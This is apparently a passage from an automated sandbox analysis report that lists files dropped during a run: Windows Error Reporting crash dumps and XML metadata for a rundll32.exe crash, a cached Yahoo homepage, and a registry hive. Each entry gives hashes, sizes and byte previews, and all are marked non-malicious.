                                                                                                                                                                    Preview:..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.A.P.P.C.R.A.S.H.....E.v.e.n.t.T.i.m.e.=.1.3.3.3.0.1.7.7.8.1.8.0.9.1.1.2.2.8.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.3.3.0.1.7.7.8.1.8.9.9.7.3.5.7.9.....R.e.p.o.r.t.S.t.a.t.u.s.=.5.2.4.3.8.4.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.8.9.f.2.6.4.4.3.-.f.7.6.8.-.4.5.c.2.-.a.d.d.5.-.3.4.7.0.5.4.9.a.d.a.9.c.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.f.7.4.2.2.3.4.e.-.2.3.6.b.-.4.9.c.d.-.b.2.7.c.-.e.4.9.a.a.a.f.d.9.1.d.5.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....N.s.A.p.p.N.a.m.e.=.r.u.n.d.l.l.3.2...e.x.e.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e.=.R.U.N.D.L.L.3.2...E.X.E.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.1.c.b.8.-.0.0.0.1.-.0.0.1.f.-.5.a.0.a.-.f.9.c.f.4.2.9.5.d.9.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.0.f.5.1.9.f.e.e.c.4.8.6.d.e.8.7.e.d.7.3.c.b.9.2.d.3.c.a.c.8.0.2.4.0.0.0.0.0.0.0.0.!.0.0.0.0.b.c.c.5.d.c.3.2.2.2.0.3.4.d.3.f.2.5.7.f.1.f.d.3.5.8.8.9.e.5.b.e.9.0.f.0.9.
                                                                                                                                                                    Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                    File Type:Mini DuMP crash report, 14 streams, Fri Jun 2 11:10:09 2023, 0x1205a4 type
                                                                                                                                                                    Category:dropped
                                                                                                                                                                    Size (bytes):36912
                                                                                                                                                                    Entropy (8bit):2.332117793404425
                                                                                                                                                                    Encrypted:false
                                                                                                                                                                    SSDEEP:192:LjG6sZy56Whh+wO5Skb54I79Gjj6kLRMq1AOMjYzu7t:AUhY5LbiI79GjjjLR51A5jRt
                                                                                                                                                                    MD5:D8988B059AD61F044FE89FBBCB6728BF
                                                                                                                                                                    SHA1:197AA532A6A62D6F10384AE948BE370188B88C79
                                                                                                                                                                    SHA-256:D9AFFE41F21415A532493F229EBED870A2FCBDFEE5AE3620242E307F246B9AA7
                                                                                                                                                                    SHA-512:6FACD3594BF0BEC4F4A63102ED924B6CBDD128F2E646FD7E7058B982957214C45783F1A0AE8D627389507FD2FD7D28E549361ABDF8FADEA6142FACE53F81BEE6
                                                                                                                                                                    Malicious:false
                                                                                                                                                                    Preview:MDMP....... .........yd............d...............l............)..........T.......8...........T...............0v...........................................................................................U...........B..............GenuineIntelW...........T.............yd.............................0..1...............W... .E.u.r.o.p.e. .S.t.a.n.d.a.r.d. .T.i.m.e.......................................W... .E.u.r.o.p.e. .D.a.y.l.i.g.h.t. .T.i.m.e.......................................1.7.1.3.4...1...x.8.6.f.r.e...r.s.4._.r.e.l.e.a.s.e...1.8.0.4.1.0.-.1.8.0.4.....................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                    Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                    File Type:Mini DuMP crash report, 14 streams, Fri Jun 2 11:10:09 2023, 0x1205a4 type
                                                                                                                                                                    Category:dropped
                                                                                                                                                                    Size (bytes):36904
                                                                                                                                                                    Entropy (8bit):2.3427213367881072
                                                                                                                                                                    Encrypted:false
                                                                                                                                                                    SSDEEP:192:LOb6sZy56Whw+uSGO5Skb5Hq66jjL2YWpuLzOyURlO4n+u:OUw9E5Lbx6jjL2YlXTURz+
                                                                                                                                                                    MD5:2BA05564BD83F65BCFA4C03384DCEC54
                                                                                                                                                                    SHA1:B89ADFEB2E93B0A8072E3479ECA7E95FCEBFEFEB
                                                                                                                                                                    SHA-256:DADB489B5FD8A71BB2E89174956106CBAE76F37CE57F897DCEE78F3570D9FF02
                                                                                                                                                                    SHA-512:455B67C51E2A70C8D079AB5B9E4B8962CD2459F97973E756E6C091910D16F677AEA456399FD7B0164E9A518A80959E22A54924E5EFA7A70DFC01ED36A23D4B6F
                                                                                                                                                                    Malicious:false
                                                                                                                                                                    Preview:MDMP....... .........yd............d...............l............)..........T.......8...........T...........P....u...........................................................................................U...........B..............GenuineIntelW...........T.......H.....yd.............................0..1...............W... .E.u.r.o.p.e. .S.t.a.n.d.a.r.d. .T.i.m.e.......................................W... .E.u.r.o.p.e. .D.a.y.l.i.g.h.t. .T.i.m.e.......................................1.7.1.3.4...1...x.8.6.f.r.e...r.s.4._.r.e.l.e.a.s.e...1.8.0.4.1.0.-.1.8.0.4.....................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                    Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                    File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                                                                                                                    Category:dropped
                                                                                                                                                                    Size (bytes):8246
                                                                                                                                                                    Entropy (8bit):3.6883238089467976
                                                                                                                                                                    Encrypted:false
                                                                                                                                                                    SSDEEP:192:Rrl7r3GLNi8D6LXm6YK+60LTgmfTTSr+prG89bVnsf0iHm:RrlsNiY6K6YT60LTgmfTTSYVsf0L
                                                                                                                                                                    MD5:FD7E4DE530A96AE6B7CAE238EFBF9F68
                                                                                                                                                                    SHA1:88444DD8464D34BCD9BE7FD38270ED000793470F
                                                                                                                                                                    SHA-256:2C9A7A3DAE8ABCA8FAC6A110257CAD9C3C109BA23630519E56F8B91C9393F0AA
                                                                                                                                                                    SHA-512:8EE5833D45CAA7FBF1A44E477127024EA634331FB7014F5DEFB49671988C2FF2E68FBE8DE653A01727DA5C7B0930512D027A9F69950AAD47167D2E751FFDD348
                                                                                                                                                                    Malicious:false
                                                                                                                                                                    Preview:..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.7.1.3.4.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.7.1.3.4...1...a.m.d.6.4.f.r.e...r.s.4._.r.e.l.e.a.s.e...1.8.0.4.1.0.-.1.8.0.4.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.1.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.1.0.3.3.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.3.9.1.2.<./.P.i.d.>.......
                                                                                                                                                                    Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                    File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                                                                    Category:dropped
                                                                                                                                                                    Size (bytes):4630
                                                                                                                                                                    Entropy (8bit):4.447340975473471
                                                                                                                                                                    Encrypted:false
                                                                                                                                                                    SSDEEP:48:cvIwSD8zs1JgtWI9jLWgc8sqYjN8fm8M4JCdspFK+q8/Ml4SrSvd:uITfPU6grsqYmJA9DWvd
                                                                                                                                                                    MD5:36904362332C0AB90D460EB6A06A4D9E
                                                                                                                                                                    SHA1:AE15F480952E58ECD95BA9090814B71F6671EBEC
                                                                                                                                                                    SHA-256:E166554B5F04899756DE20D3FCD5179F9326BF40ED766FA0D10DF568CBE97250
                                                                                                                                                                    SHA-512:63D8DB462CA60CF96301DDB9919E8411E10E8FD32E2275D31631E67B66BAE34AA75CD313B23187ED862C2AA116E9E52962A3B797B8567FC3441CD14CCA016754
                                                                                                                                                                    Malicious:false
                                                                                                                                                                    Preview:<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="17134" />.. <arg nm="vercsdbld" val="1" />.. <arg nm="verqfe" val="1" />.. <arg nm="csdbld" val="1" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="1033" />.. <arg nm="geoid" val="244" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="2067620" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.1.17134.0-11.0.47" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="4096" />..
                                                                                                                                                                    Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                    File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                                                                                                                    Category:dropped
                                                                                                                                                                    Size (bytes):8250
                                                                                                                                                                    Entropy (8bit):3.688448149273447
                                                                                                                                                                    Encrypted:false
                                                                                                                                                                    SSDEEP:192:Rrl7r3GLNiy76pXo6Y8k6rgmfTTSr+prF89bVwsf02Hm:RrlsNiu6G6Yv6rgmfTTSFVDfK
                                                                                                                                                                    MD5:BD3ED8F836209C6E77AC5D665A73D250
                                                                                                                                                                    SHA1:43912563EBE9C74276EE509CE85790A11008C891
                                                                                                                                                                    SHA-256:275B5CFD54A3EBB64A93876C69049E33DE7DBE2311396802B72CBBC9EE8836AB
                                                                                                                                                                    SHA-512:465B639ED5FD7B20420B6AD9C69484644C17AC294FD6349E3F56BC0410BC7F61CA828E63FEF8DA1A1EC009500CACD69ED55C50DFA9DBEA325CA739C8337DD02E
                                                                                                                                                                    Malicious:false
                                                                                                                                                                    Preview:..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.7.1.3.4.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.7.1.3.4...1...a.m.d.6.4.f.r.e...r.s.4._.r.e.l.e.a.s.e...1.8.0.4.1.0.-.1.8.0.4.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.1.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.1.0.3.3.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.7.0.8.0.<./.P.i.d.>.......
                                                                                                                                                                    Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                    File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                                                                    Category:dropped
                                                                                                                                                                    Size (bytes):4630
                                                                                                                                                                    Entropy (8bit):4.4486985472879566
                                                                                                                                                                    Encrypted:false
                                                                                                                                                                    SSDEEP:48:cvIwSD8zs1JgtWI9jLWgc8sqYji8fm8M4JCdspFk+q8/MMQ4SrSUd:uITfPU6grsqYLJy1DWUd
                                                                                                                                                                    MD5:64A91FB57C7F24E6AC5E7A22177E4746
                                                                                                                                                                    SHA1:7B5E88AEA3F72EF40A2CD7D18D4724C5551D37D1
                                                                                                                                                                    SHA-256:5CEA00516D427C56A2EE1F6510BF5834A0A20BE00BBA62770B48E57794F3A17B
                                                                                                                                                                    SHA-512:4A5FC275D940BDA25E7679149C0EB390306B56D3003C7312D97EFD3F34A809AC1FB17A0D63FBFA93018A930D2C51135EA2E70F502FE04AE047429FBC62385D44
                                                                                                                                                                    Malicious:false
                                                                                                                                                                    Preview:<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="17134" />.. <arg nm="vercsdbld" val="1" />.. <arg nm="verqfe" val="1" />.. <arg nm="csdbld" val="1" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="1033" />.. <arg nm="geoid" val="244" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="2067620" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.1.17134.0-11.0.47" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="4096" />..
                                                                                                                                                                    Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                    File Type:Mini DuMP crash report, 14 streams, Fri Jun 2 11:10:18 2023, 0x1205a4 type
                                                                                                                                                                    Category:dropped
                                                                                                                                                                    Size (bytes):38464
                                                                                                                                                                    Entropy (8bit):2.2156517536630402
                                                                                                                                                                    Encrypted:false
                                                                                                                                                                    SSDEEP:192:+RyX6sZy56Wh9+EO5Skb5b/FPHqY2r4DrKjj7TVx0OvW9+npL:FU9M5Lb/iY2r4DrKjjn/0+W9WF
                                                                                                                                                                    MD5:FE7876907848AA70AAEB69694BD3A374
                                                                                                                                                                    SHA1:5A455D815BD4D7C5911C89054B3F32374C4F7631
                                                                                                                                                                    SHA-256:E7BA33A2FBC81F1F8DDE8E74BDF062F7E01DAF42AD601305D3F41CFC8629B5E3
                                                                                                                                                                    SHA-512:206D6CBEA4AFC10B45459534842F7518C581D11D00576CCD1379716760D909011D4E8ADA8EE0C579D7B1AAEE810F10225C043E770BDB040976CB6C11E0033136
                                                                                                                                                                    Malicious:false
                                                                                                                                                                    Preview:MDMP....... .........yd............d...............l............)..........T.......8...........T...............@|...........................................................................................U...........B..............GenuineIntelW...........T.......p.....yd.............................0..1...............W... .E.u.r.o.p.e. .S.t.a.n.d.a.r.d. .T.i.m.e.......................................W... .E.u.r.o.p.e. .D.a.y.l.i.g.h.t. .T.i.m.e.......................................1.7.1.3.4...1...x.8.6.f.r.e...r.s.4._.r.e.l.e.a.s.e...1.8.0.4.1.0.-.1.8.0.4.....................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                    Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                    File Type:Mini DuMP crash report, 14 streams, Fri Jun 2 11:10:18 2023, 0x1205a4 type
                                                                                                                                                                    Category:dropped
                                                                                                                                                                    Size (bytes):43044
                                                                                                                                                                    Entropy (8bit):2.13685629712902
                                                                                                                                                                    Encrypted:false
                                                                                                                                                                    SSDEEP:192:+RqdrQQknQrAoO5Skb52alBBjjZV6nQazAeDOxDT56:gnQrAv5LbJlrjj/6QazAe856
                                                                                                                                                                    MD5:8F512DBE836F6813E869BB4EC4784F43
                                                                                                                                                                    SHA1:7C4EF39960AEFF74D0CDCADB7F19AE968B72F4DF
                                                                                                                                                                    SHA-256:C47FD95EDCF530442901EFEF23C7F63D847ECF09778ACB7DF614F4831B7B2F59
                                                                                                                                                                    SHA-512:5EF22BAF03FD4BC5A91011BD3F928B7AD738E61BD7F21762C3A3724ADD59D0BACD70D0983D80D288FD0EB2F1E4B7B5B5EF0B05EF3DE276C8342E447897FE5B1A
                                                                                                                                                                    Malicious:false
                                                                                                                                                                    Preview:MDMP....... .........yd.........................................,..........T.......8...........T...............$...........0................................................................................U...........B..............GenuineIntelW...........T.............yd.............................0..1...............W... .E.u.r.o.p.e. .S.t.a.n.d.a.r.d. .T.i.m.e.......................................W... .E.u.r.o.p.e. .D.a.y.l.i.g.h.t. .T.i.m.e.......................................1.7.1.3.4...1...x.8.6.f.r.e...r.s.4._.r.e.l.e.a.s.e...1.8.0.4.1.0.-.1.8.0.4.....................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                    Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                    File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                                                                                                                    Category:dropped
                                                                                                                                                                    Size (bytes):8240
                                                                                                                                                                    Entropy (8bit):3.6882042653047837
                                                                                                                                                                    Encrypted:false
                                                                                                                                                                    SSDEEP:192:Rrl7r3GLNiAC6KXM56Y8QD6CgmfTTSr+pr+89bNqsf5vm:RrlsNi16P6YJD6CgmfTTSANJfs
                                                                                                                                                                    MD5:2BC0C64B6DC9F08B8BE8F8E8ACBA2EFF
                                                                                                                                                                    SHA1:E432A9957FBB743E5D4E4863B89FACD8245E976A
                                                                                                                                                                    SHA-256:EFB434E3386D7E186659D8FC7812997963490DD0972BE2732839A3D6166E65FD
                                                                                                                                                                    SHA-512:DCA3913DF1E001E18EE4777FECB562A2B5B950CCAC3A5C0198222BD6BE5555FFC2CF87AF7B4B6EFFE9D184D1A2FE63E84AC16BEC5907E485D0B9B84AB2C55609
                                                                                                                                                                    Malicious:false
                                                                                                                                                                    Preview:..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.7.1.3.4.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.7.1.3.4...1...a.m.d.6.4.f.r.e...r.s.4._.r.e.l.e.a.s.e...1.8.0.4.1.0.-.1.8.0.4.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.1.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.1.0.3.3.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.7.2.8.0.<./.P.i.d.>.......
                                                                                                                                                                    Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                    File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                                                                    Category:dropped
                                                                                                                                                                    Size (bytes):4630
                                                                                                                                                                    Entropy (8bit):4.449104314387886
                                                                                                                                                                    Encrypted:false
                                                                                                                                                                    SSDEEP:48:cvIwSD8zs1JgtWI9jLWgc8sqYj+8fm8M4JCdspFIEm+q8/Ms4SrSWd:uITfPU6grsqYvJKkDWWd
                                                                                                                                                                    MD5:107C9076ED02B4399866DE8EC21C010C
                                                                                                                                                                    SHA1:5BBC3939D5DE840E187142C3DFCE67FFEC6A215F
                                                                                                                                                                    SHA-256:2539145F32F21AC0C737BA910F82E2305067AE4531E9554AE71E895EC4225DF1
                                                                                                                                                                    SHA-512:45D738D7D697A30D14EB030377CC93AADC8690B34C5E7C64FA6B60569C0ECA562B0B3E2D3518E0029DF4B3EEC071E388CF3E620AB980ED0170B152C2C10740B5
                                                                                                                                                                    Malicious:false
                                                                                                                                                                    Preview:<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="17134" />.. <arg nm="vercsdbld" val="1" />.. <arg nm="verqfe" val="1" />.. <arg nm="csdbld" val="1" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="1033" />.. <arg nm="geoid" val="244" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="2067620" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.1.17134.0-11.0.47" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="4096" />..
                                                                                                                                                                    Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                    File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                                                                                                                    Category:dropped
                                                                                                                                                                    Size (bytes):8240
                                                                                                                                                                    Entropy (8bit):3.6876339184623923
                                                                                                                                                                    Encrypted:false
                                                                                                                                                                    SSDEEP:192:Rrl7r3GLNiWi6hXw6Y8Q16CgmfTLSr+pru89bNlsfdKvm:RrlsNiD6m6YJ16CgmfTLSAN+fZ
                                                                                                                                                                    MD5:93BE86D590515C25A34803E91DB280A7
                                                                                                                                                                    SHA1:6399C677D858AE2568DF2C35CCD7995171687887
                                                                                                                                                                    SHA-256:DE0D5C2ABAA3D925B42D3543A4A21A6840FF24C62F007707AD7D49A04FFBB719
                                                                                                                                                                    SHA-512:9F4376C5130A700ECE274CCA321D9420E81B13FFB51B859F368EF855EA8F68277B5A5BDD47A0310472AD97EE0EEBF264314F1F8626C525A667467EA87F57660F
                                                                                                                                                                    Malicious:false
                                                                                                                                                                    Preview:..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.7.1.3.4.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.7.1.3.4...1...a.m.d.6.4.f.r.e...r.s.4._.r.e.l.e.a.s.e...1.8.0.4.1.0.-.1.8.0.4.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.1.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.1.0.3.3.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.7.3.5.2.<./.P.i.d.>.......
                                                                                                                                                                    Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                    File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                                                                    Category:dropped
                                                                                                                                                                    Size (bytes):4630
                                                                                                                                                                    Entropy (8bit):4.4462764699221395
                                                                                                                                                                    Encrypted:false
                                                                                                                                                                    SSDEEP:48:cvIwSD8zs1JgtWI9jLWgc8sqYjz8fm8M4JCdspFMe+q8/Mw4SrSy6d:uITfPU6grsqYMJ2eYDWy6d
                                                                                                                                                                    MD5:3382848DFEC582C4FC825E8743EF77F6
                                                                                                                                                                    SHA1:E8F044990030E70BA9ED59992E7EA7F9D85B3299
                                                                                                                                                                    SHA-256:46706183CA8A907446C1942B0D460EB94959140CEB803E0FFBD19D3CCFA3C12A
                                                                                                                                                                    SHA-512:DBA6B83CCB0302B81AC49BDCCB852E08F2FAC4C1F9B08843119AF81F2A13FD2AD5981857E60354BF30272FFF5FE4809132DEF84B15C3A317146F987FB9996963
                                                                                                                                                                    Malicious:false
                                                                                                                                                                    Preview:<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="17134" />.. <arg nm="vercsdbld" val="1" />.. <arg nm="verqfe" val="1" />.. <arg nm="csdbld" val="1" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="1033" />.. <arg nm="geoid" val="244" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="2067620" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.1.17134.0-11.0.47" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="4096" />..
                                                                                                                                                                    Process:C:\Windows\SysWOW64\wermgr.exe
                                                                                                                                                                    File Type:HTML document, ASCII text, with very long lines (64945)
                                                                                                                                                                    Category:dropped
                                                                                                                                                                    Size (bytes):873473
                                                                                                                                                                    Entropy (8bit):5.57661822262701
                                                                                                                                                                    Encrypted:false
                                                                                                                                                                    SSDEEP:12288:O+RMH3OYPgKPCNMtAqVSlJecKYO7ZaBpusOn3nuOOqA3:O+RMXOYPgKztAqVSlJecKYO7ZaT
                                                                                                                                                                    MD5:E740E91E986658700271371D1D8B8491
                                                                                                                                                                    SHA1:0742CDF1ECEDE5878DF040B0219E6F8F6B206B63
                                                                                                                                                                    SHA-256:5896E3FB8DCF26DE9C85B0C2EB4A815FD508910759BF2758979EAF389E03124A
                                                                                                                                                                    SHA-512:D06515F147F11619BE49A4F79F14455B23C050347E0785C1B4694B79E7DFC5D367A959D063868A861B47757FFDF7C7214077909B8FAE52595C05ADBEDBA77112
                                                                                                                                                                    Malicious:false
                                                                                                                                                                    Preview:<!doctype html><html id=atomic class="ltr fp desktop-lite fp-none bkt900 ua-ie ua-11.0" lang=en-US data-color-scheme><head><script nonce=b3025903f84f8df2370c2986c321624c79f3f89922a4b109a09cdcc9dbf23113>. window.performance.mark('PageStart');. document.documentElement.className += ' JsEnabled jsenabled';. /**. * Empty darlaOnready method, to avoid JS error.. * This can happen when Async Darla JS file is loaded earlier than Darla Proxy JS.. * This method will be overridden by Darla Proxy. */. window.darlaOnready = function() {};. </script><title>Yahoo | Mail, Weather, Search, Politics, News, Finance, Sports &amp; Videos</title><meta http-equiv=content-type content="text/html; charset=utf-8"><meta http-equiv=x-dns-prefetch-control content=on><meta http-equiv=X-UA-Compatible content=chrome=1><meta name=description content="Latest news coverage, email, free stock quotes, live scores and video are just the beginning. Discover m
                                                                                                                                                                    Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                    File Type:MS Windows registry file, NT/2000 or above
                                                                                                                                                                    Category:dropped
                                                                                                                                                                    Size (bytes):1572864
                                                                                                                                                                    Entropy (8bit):4.311327827863829
                                                                                                                                                                    Encrypted:false
                                                                                                                                                                    SSDEEP:12288:cbmVC8m5604Emi7gA59ukF0HGInyMS54VukEU+qJAw9Sa0zTxu:smVC8m5604di7gl1G3
                                                                                                                                                                    MD5:1273578B5BA0FEEAF135A43038C8FE5D
                                                                                                                                                                    SHA1:A91282F149C726E16B837C0C7E085B19593F5C71
